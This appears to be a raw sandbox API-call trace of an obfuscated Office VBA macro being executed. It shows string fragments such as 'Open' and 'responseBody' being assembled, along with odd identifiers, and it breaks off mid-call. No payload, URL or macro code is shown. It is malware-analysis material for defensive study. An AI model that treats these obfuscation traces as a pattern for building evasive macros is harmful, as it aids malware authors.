[0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6056a, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="uch") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52f6b8, cbMultiByte=4, lpWideCharStr=0x9e00674, cchWideChar=10 | out: lpWideCharStr="Open") returned 4 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52f6c0, cbMultiByte=0, lpWideCharStr=0x9e006e2, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0045.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52f6d8, cbMultiByte=3, lpWideCharStr=0x9e01f80, cchWideChar=8 | out: lpWideCharStr="res") returned 3 [0045.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52f6e0, cbMultiByte=7, lpWideCharStr=0x9e01fec, cchWideChar=16 | out: lpWideCharStr="ponseBo") returned 7 [0045.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52f6ee, cbMultiByte=2, lpWideCharStr=0x9e020c0, cchWideChar=6 | out: lpWideCharStr="dy") returned 2 [0045.490] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x784d158, ppTLib=0x2e4440, pIndex=0x0 | out: ppTLib=0x2e4440*=0x782a220, pIndex=0x0) returned 0x0 [0045.490] ITypeLib:RemoteGetLibAttr (in: This=0x782a220, ppTLibAttr=0x2e4480, pDummy=0x0 | out: ppTLibAttr=0x2e4480, pDummy=0x0) returned 0x0 [0045.490] ITypeLib:LocalReleaseTLibAttr (This=0x782a220) returned 0x0 [0045.490] IUnknown:Release (This=0x782a220) returned 0x22 [0045.490] ITypeInfo:LocalReleaseVarDesc (This=0x784d158) returned 0x0 [0045.491] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0045.491] IUnknown:AddRef (This=0xb4dba40) returned 0x6 [0045.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Class", cchWideChar=6, lpMultiByteStr=0x2e4560, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class", lpUsedDefaultChar=0x0) returned 6 [0045.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class") returned 0x10bb1a [0045.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Class", cchWideChar=6, lpMultiByteStr=0x2e4560, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class", lpUsedDefaultChar=0x0) returned 6 [0045.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class") returned 0x10bb1a [0045.491] GetLocalTime (in: lpSystemTime=0x2e4958 | out: lpSystemTime=0x2e4958*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x30, wMilliseconds=0x173)) [0045.491] _ultow_s (in: _Value=0x5b6852ec, _Buffer=0xb4c6564, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852ec") returned 0x0 [0045.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0@5b6852ec", cchWideChar=11, lpMultiByteStr=0x2e48b0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0@5b6852ec", lpUsedDefaultChar=0x0) returned 11 [0045.491] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0045.491] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0045.491] IUnknown:AddRef (This=0xb4dba40) returned 0x7 [0045.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Class", cchWideChar=6, lpMultiByteStr=0x2e4310, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class", lpUsedDefaultChar=0x0) returned 6 [0045.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class") returned 0x10bb1a [0045.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Class", cchWideChar=6, lpMultiByteStr=0x2e4310, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class", lpUsedDefaultChar=0x0) returned 6 [0045.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class") returned 0x10bb1a [0045.491] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0045.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_of_word_outline") returned 0x10df71 [0045.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="word_outline") returned 0x10e483 [0045.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_of_word_outline") returned 0x10df71 [0045.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="word_outline") returned 0x10e483 [0045.492] IUnknown:AddRef (This=0xb4db990) returned 0x5 [0045.492] IMalloc:Alloc (This=0x7fefe015380, cb=0x14) returned 0x72f72a0 [0045.492] IUnknown:AddRef (This=0xb4dba40) returned 0x7 [0045.492] IUnknown:AddRef (This=0xb4db990) returned 0x5 [0045.493] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0xb5a81f0 [0045.493] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0xb5a95d0 [0045.493] IUnknown:AddRef (This=0xb4db990) returned 0x5 [0045.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_of_word_outline") returned 0x10df71 [0045.493] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e8800 [0045.493] strcpy_s (in: _Dst=0xb64ad20, _DstSize=0x1b, _Src="doc_of_word_outline_level6" | out: _Dst="doc_of_word_outline_level6") returned 0x0 [0045.493] IMalloc:Free (This=0x7fefe015380, pv=0xb65a7d0) [0045.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="word_outline") returned 0x10e483 [0045.493] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e87b0 [0045.493] strcpy_s (in: _Dst=0xb64ad48, _DstSize=0x14, _Src="word_outline_level6" | out: _Dst="word_outline_level6") returned 0x0 [0045.493] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb64b4d0 [0045.493] IMalloc:Free (This=0x7fefe015380, pv=0xb65a7d0) [0045.493] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0xb5ad470 [0045.493] strcpy_s (in: _Dst=0xb64ad68, _DstSize=0x9, _Src="WriteLOG" | out: _Dst="WriteLOG") returned 0x0 [0045.493] strcpy_s (in: _Dst=0xb5c79d8, _DstSize=0x9, _Src="sMessage" | out: _Dst="sMessage") returned 0x0 [0045.493] IMalloc:Free (This=0x7fefe015380, pv=0xb65a7d0) [0045.493] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e9020 [0045.493] strcpy_s (in: _Dst=0xb64ad80, _DstSize=0x9, _Src="peascock" | out: _Dst="peascock") returned 0x0 [0045.493] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb64b720 [0045.493] IMalloc:Free (This=0x7fefe015380, pv=0xb65a7d0) [0045.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_of_word_outline") returned 0x10df71 [0045.494] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e90c0 [0045.494] strcpy_s (in: _Dst=0xb5c7fd8, _DstSize=0x1b, _Src="doc_of_word_outline_level7" | out: _Dst="doc_of_word_outline_level7") returned 0x0 [0045.494] IMalloc:Free (This=0x7fefe015380, pv=0xb65a7d0) [0045.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="word_outline") returned 0x10e483 [0045.494] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e9070 [0045.494] strcpy_s (in: _Dst=0xb5c8000, _DstSize=0x14, _Src="word_outline_level7" | out: _Dst="word_outline_level7") returned 0x0 [0045.494] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb64b970 [0045.494] IMalloc:Free (This=0x7fefe015380, pv=0xb65a7d0) [0045.494] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0xb5ad4d0 [0045.494] strcpy_s (in: _Dst=0xb5c8020, _DstSize=0xd, _Src="ErrorMessage" | out: _Dst="ErrorMessage") returned 0x0 [0045.494] IMalloc:Free (This=0x7fefe015380, pv=0xb65a7d0) [0045.494] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0xb5ad530 [0045.494] strcpy_s (in: _Dst=0xb64ad98, _DstSize=0xc, _Src="InfoMessage" | out: _Dst="InfoMessage") returned 0x0 [0045.494] IMalloc:Free (This=0x7fefe015380, pv=0xb65a7d0) [0045.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rapeObject") returned 0x1096ef [0045.494] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0xb, _Src="rapeObject" | out: _Dst="rapeObject") returned 0x0 [0045.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=11, lpWideCharStr=0x2e44f0, cchWideChar=11 | out: lpWideCharStr="rapeObject") returned 11 [0045.494] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.494] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="rapeObject", lHashVal=0x1096ef, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.494] IUnknown:Release (This=0x782a220) returned 0x22 [0045.494] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.494] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="rapeObject", lHashVal=0x1096ef, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.494] IUnknown:Release (This=0x731da90) returned 0x15 [0045.494] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.494] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="rapeObject", lHashVal=0x1096ef, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.494] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.494] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.494] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="rapeObject", lHashVal=0x1096ef, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.494] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.495] IMalloc:Alloc (This=0x7fefe015380, cb=0x12) returned 0xb494df0 [0045.495] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_rapeObject") returned 0x10051a [0045.495] strcpy_s (in: _Dst=0x2e4850, _DstSize=0x12, _Src="_B_var_rapeObject" | out: _Dst="_B_var_rapeObject") returned 0x0 [0045.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=18, lpWideCharStr=0x2e46a0, cchWideChar=18 | out: lpWideCharStr="_B_var_rapeObject") returned 18 [0045.495] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.495] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_rapeObject", lHashVal=0x10051a, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.495] IUnknown:Release (This=0x782a220) returned 0x22 [0045.495] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.495] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_rapeObject", lHashVal=0x10051a, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.495] IUnknown:Release (This=0x731da90) returned 0x15 [0045.495] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.495] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_rapeObject", lHashVal=0x10051a, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.495] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.495] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.495] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_rapeObject", lHashVal=0x10051a, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.495] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.495] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.495] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_rapeObject", lHashVal=0x10051a, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.495] IUnknown:Release (This=0x782b300) returned 0x6 [0045.495] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.495] IUnknown:Release (This=0x782a220) returned 0x22 [0045.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50302, cbMultiByte=10, lpWideCharStr=0x2e4560, cchWideChar=9 | out: lpWideCharStr="peascock") returned 0 [0045.495] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb64be10 [0045.495] wcscpy_s (in: _Destination=0xb64be38, _SizeInWords=0x9, _Source="peascock" | out: _Destination="peascock") returned 0x0 [0045.495] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9f50000 [0045.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6056a, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="uch") returned 0 [0045.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6056a, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="uch") returned 0 [0045.497] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xa500000 [0045.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6056a, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="uch") returned 0 [0045.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.500] IMalloc:Free (This=0x7fefe015380, pv=0xb5a5e50) [0045.500] SetErrorMode (uMode=0x8001) returned 0x8005 [0045.500] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0045.500] SetErrorMode (uMode=0x8005) returned 0x8005 [0045.500] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x245) returned 0x7fee381ea78 [0045.501] IUnknown:AddRef (This=0xb4db990) returned 0x5 [0045.501] IUnknown:AddRef (This=0xb4db990) returned 0x5 [0045.501] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494df0 [0045.501] IMalloc:Free (This=0x7fefe015380, pv=0xb494df0) [0045.501] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494df0 [0045.501] IMalloc:Free (This=0x7fefe015380, pv=0xb494df0) [0045.501] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb494df0 [0045.501] IMalloc:Free (This=0x7fefe015380, pv=0xb494df0) [0045.501] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494df0 [0045.501] IMalloc:Free (This=0x7fefe015380, pv=0xb494df0) [0045.501] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494df0 [0045.501] IMalloc:Free (This=0x7fefe015380, pv=0xb494df0) [0045.501] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494df0 [0045.501] IMalloc:Free (This=0x7fefe015380, pv=0xb494df0) [0045.501] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb494df0 [0045.501] IMalloc:Free (This=0x7fefe015380, pv=0xb494df0) [0045.501] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb494df0 [0045.501] IMalloc:Free (This=0x7fefe015380, pv=0xb494df0) [0045.503] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_BackBuffer") returned 0x109d05 [0045.503] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.503] IUnknown:Release (This=0x782a220) returned 0x22 [0045.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a525b6, cbMultiByte=8, lpWideCharStr=0x2e4400, cchWideChar=7 | out: lpWideCharStr="isLost") returned 0 [0045.504] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DirectDraw_Tiles") returned 0x109e59 [0045.504] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x11, _Src="DirectDraw_Tiles" | out: _Dst="DirectDraw_Tiles") returned 0x0 [0045.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=17, lpWideCharStr=0x2e4390, cchWideChar=17 | out: lpWideCharStr="DirectDraw_Tiles") returned 17 [0045.504] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.504] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="DirectDraw_Tiles", lHashVal=0x109e59, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.504] IUnknown:Release (This=0x782a220) returned 0x22 [0045.504] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.504] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="DirectDraw_Tiles", lHashVal=0x109e59, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.504] IUnknown:Release (This=0x731da90) returned 0x15 [0045.504] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.504] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="DirectDraw_Tiles", lHashVal=0x109e59, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.504] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.504] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.504] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="DirectDraw_Tiles", lHashVal=0x109e59, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.504] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.504] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb494df0 [0045.504] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DirectDraw_Tiles") returned 0x104253 [0045.504] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0x18, _Src="_B_var_DirectDraw_Tiles" | out: _Dst="_B_var_DirectDraw_Tiles") returned 0x0 [0045.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=24, lpWideCharStr=0x2e4540, cchWideChar=24 | out: lpWideCharStr="_B_var_DirectDraw_Tiles") returned 24 [0045.504] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.504] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_DirectDraw_Tiles", lHashVal=0x104253, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.504] IUnknown:Release (This=0x782a220) returned 0x22 [0045.504] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.504] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_DirectDraw_Tiles", lHashVal=0x104253, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.504] IUnknown:Release (This=0x731da90) returned 0x15 [0045.504] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.504] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_DirectDraw_Tiles", lHashVal=0x104253, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.504] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.504] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.504] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_DirectDraw_Tiles", lHashVal=0x104253, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.504] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.504] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.504] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_DirectDraw_Tiles", lHashVal=0x104253, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.504] IUnknown:Release (This=0x782b300) returned 0x6 [0045.504] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.504] IUnknown:Release (This=0x782a220) returned 0x22 [0045.505] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AnimsPlayed") returned 0x109d7a [0045.505] strcpy_s (in: _Dst=0x2e4480, _DstSize=0xc, _Src="AnimsPlayed" | out: _Dst="AnimsPlayed") returned 0x0 [0045.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4480, cbMultiByte=12, lpWideCharStr=0x2e42d0, cchWideChar=12 | out: lpWideCharStr="AnimsPlayed") returned 12 [0045.505] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.505] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="AnimsPlayed", lHashVal=0x109d7a, pfName=0x2e43a0, pBstrLibName=0x2e42d0 | out: pfName=0x2e43a0*=0, pBstrLibName=0x2e42d0) returned 0x0 [0045.505] IUnknown:Release (This=0x782a220) returned 0x22 [0045.505] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.505] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="AnimsPlayed", 